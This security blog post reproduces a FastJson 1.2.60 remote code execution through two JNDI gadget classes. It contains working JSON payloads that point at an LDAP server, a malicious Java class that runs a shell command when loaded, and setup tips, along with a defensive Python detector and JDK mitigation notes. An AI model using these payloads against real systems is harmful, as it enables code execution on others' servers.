
[Vulnerability Reproduction] FastJson 1.2.60 Remote Code Execution (gadgets from third-party jars)

Posted at 2019-09-19

Preface

Recently the security researcher 浅蓝色de忧伤 published 「抽象语法树分析寻找FastJSON的Gadgets」 (Finding FastJSON Gadgets with Abstract Syntax Tree Analysis) on Freebuf. Following that article, two FastJson gadgets usable for JNDI injection were made public. At the time of writing, FastJson upstream has not added either gadget to its denylist.

Reproduction environment

  • JDK 8u20
  • Required jars:
fastjson-1.2.60.jar
commons-configuration-1.4.jar
ojdbc14-10.2.0.2.0.jar
javax.resource-api-1.7.1.jar

FastJson reproduction

FastJsonTest.java

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastJsonTest {
    public static void main(String[] args){

        // Neither gadget is reachable with the default ParserConfig: AutoType has to be switched on.
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // Gadget 1 (ojdbc14): JNDI injection through the xaDataSourceName property.
        String jsonStr1 ="{\"@type\":\"oracle.jdbc.connector.OracleManagedConnectionFactory\",\"xaDataSourceName\":\"ldap://127.0.0.1:1389/ExportObject\"}";

        // Gadget 2 (commons-configuration): JNDI injection through the prefix property.
        String jsonStr2 = "{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"ldap://127.0.0.1:1389/ExportObject\"}";

        // Parse one payload at a time; swap in jsonStr2 to exercise the second gadget.
        JSONObject json = JSON.parseObject(jsonStr1);
        json.toJSONString();
    }
}

Malicious class ExportObject.java

import java.io.BufferedReader;
import java.io.InputStreamReader;

// Served to the victim JVM via the ldap://127.0.0.1:1389/ExportObject reference;
// the constructor runs as soon as the class is instantiated.
public class ExportObject {
    public ExportObject() throws Exception {
        // Proof-of-concept command (macOS): launch the Calculator.
        Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");
        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();

        String line;
        while((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }

        // Return the command output through the exception message so the caller can see it.
        String result = sb.toString();
        Exception e = new Exception(result);
        throw e;
    }

    public static void main(String[] args) throws Exception {
    }
}

Result of the oracle.jdbc.connector.OracleManagedConnectionFactory payload:

[Screenshot: oracle.jdbc.connector.OracleManagedConnectionFactory]

Result of the org.apache.commons.configuration.JNDIConfiguration payload:

[Screenshot: org.apache.commons.configuration.JNDIConfiguration]
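Both payloads share the same shape on the wire: an @type key naming a class whose setter performs a JNDI lookup, and a string value carrying an ldap:// or rmi:// URI. The following detector is an added example written for this page (not code from the original post or from FastJson) that scans an HTTP request body for that pattern. The gadget class names come from the payloads above; the list of JNDI URI schemes, the fallback regexes for non-strict JSON, and the L...; unwrapping (the FastJson 1.2.41/1.2.42 denylist bypass) are my own assumptions. It is a detection aid, not a substitute for leaving AutoType disabled.

```python
import json
import re

# The two gadget classes reproduced on this page (alibaba/fastjson issue 2756);
# extend this set with whatever else is on your own classpath.
KNOWN_JNDI_GADGETS = {
    "oracle.jdbc.connector.OracleManagedConnectionFactory",
    "org.apache.commons.configuration.JNDIConfiguration",
}

# URI schemes a JNDI lookup will resolve against a remote naming service (assumed list).
JNDI_SCHEMES = r"(?:ldaps?|rmi|iiop|corbaname)"
JNDI_URI = re.compile(r"^\s*" + JNDI_SCHEMES + r"://", re.IGNORECASE)

# Raw-text fallbacks for bodies that are not strict JSON; FastJSON accepts single quotes,
# unquoted keys and \u0040 in place of '@', so json.loads alone is not enough.
RAW_TYPE_KEY = re.compile(r"""["']?(?:@|\\u0040)type["']?\s*:""", re.IGNORECASE)
RAW_JNDI = re.compile(JNDI_SCHEMES + r"""://[^\s"']+""", re.IGNORECASE)


def normalize_type_name(name):
    """Strip the L...; descriptor wrapping used to slip past the denylist in 1.2.41/1.2.42."""
    while len(name) > 2 and name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def _walk(node, path="$"):
    """Depth-first traversal yielding (json_path, key, value) for every member."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            yield child, key, value
            yield from _walk(value, child)
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            child = f"{path}[{idx}]"
            yield child, None, value
            yield from _walk(value, child)


def scan_fastjson_body(body):
    """Return findings for one request body as dicts with keys rule, path, detail.

    rule is one of:
      known_gadget    - @type names a class in KNOWN_JNDI_GADGETS
      autotype_marker - @type present (only dangerous if the server enabled AutoType)
      jndi_uri        - a string value is a JNDI URI
    """
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        # Not strict JSON: fall back to pattern matching on the raw text.
        if RAW_TYPE_KEY.search(body):
            findings.append({"rule": "autotype_marker", "path": "raw", "detail": "@type key"})
        for m in RAW_JNDI.finditer(body):
            findings.append({"rule": "jndi_uri", "path": "raw", "detail": m.group(0)})
        return findings

    for path, key, value in _walk(doc):
        if key == "@type" and isinstance(value, str):
            cls = normalize_type_name(value)
            rule = "known_gadget" if cls in KNOWN_JNDI_GADGETS else "autotype_marker"
            findings.append({"rule": rule, "path": path, "detail": cls})
        if isinstance(value, str) and JNDI_URI.match(value):
            findings.append({"rule": "jndi_uri", "path": path, "detail": value.strip()})
    return findings


def is_jndi_injection_attempt(body):
    """True when the body names a known gadget or carries a JNDI URI."""
    return any(f["rule"] in ("known_gadget", "jndi_uri") for f in scan_fastjson_body(body))


if __name__ == "__main__":
    # Constructed sample: the first payload from this page, as it would arrive in an HTTP body.
    sample = '{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"ldap://127.0.0.1:1389/ExportObject"}'
    for finding in scan_fastjson_body(sample):
        print(finding)
```

Run it over request bodies (WAF logs, a proxy capture) and treat known_gadget or jndi_uri as high-severity; a bare autotype_marker is only a lead, since @type is legitimate traffic for applications that deliberately enable AutoType.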

Summary

For real-world engagements these two gadgets are of limited value: the jars they depend on ship with neither the JDK nor common middleware, and AutoType must additionally have been enabled by hand. The technique of using AST analysis to hunt for exploitable classes, however, is well worth learning.

Postscript

Readers who do not know how to start RMI and LDAP services can consult my article 《如何快速开启RMI&&LDAP》; a quick HTTP server can be started with python -m SimpleHTTPServer (python3 -m http.server on Python 3).
When using JNDI for RCE, keep the JDK's JNDI fixes in mind; see pyn3rd's figure. In short: com.sun.jndi.rmi.object.trustURLCodebase defaults to false from 8u121 (also 6u141, 7u131) and com.sun.jndi.ldap.object.trustURLCodebase from 8u191 (also 6u211, 7u201, 11.0.1), so a target on those versions will not fetch ExportObject from a remote codebase unless the property has been re-enabled. The 8u20 environment above predates both fixes.

[Figure: JDK fixes for JNDI]

Acknowledgements

pyn3rd

References

https://github.com/alibaba/fastjson/issues/2756
https://www.freebuf.com/articles/web/213327.html
https://mp.weixin.qq.com/s/TuQWvyro5vphyeZCAo_Y6g

Recruitment

亚信安全 (AsiaInfo Security) is hiring; see the link below (or the recruitment notice on this WeChat account) to submit your CV.
https://mp.weixin.qq.com/s/88K0GFPWYXD5MlBioPd5qQ
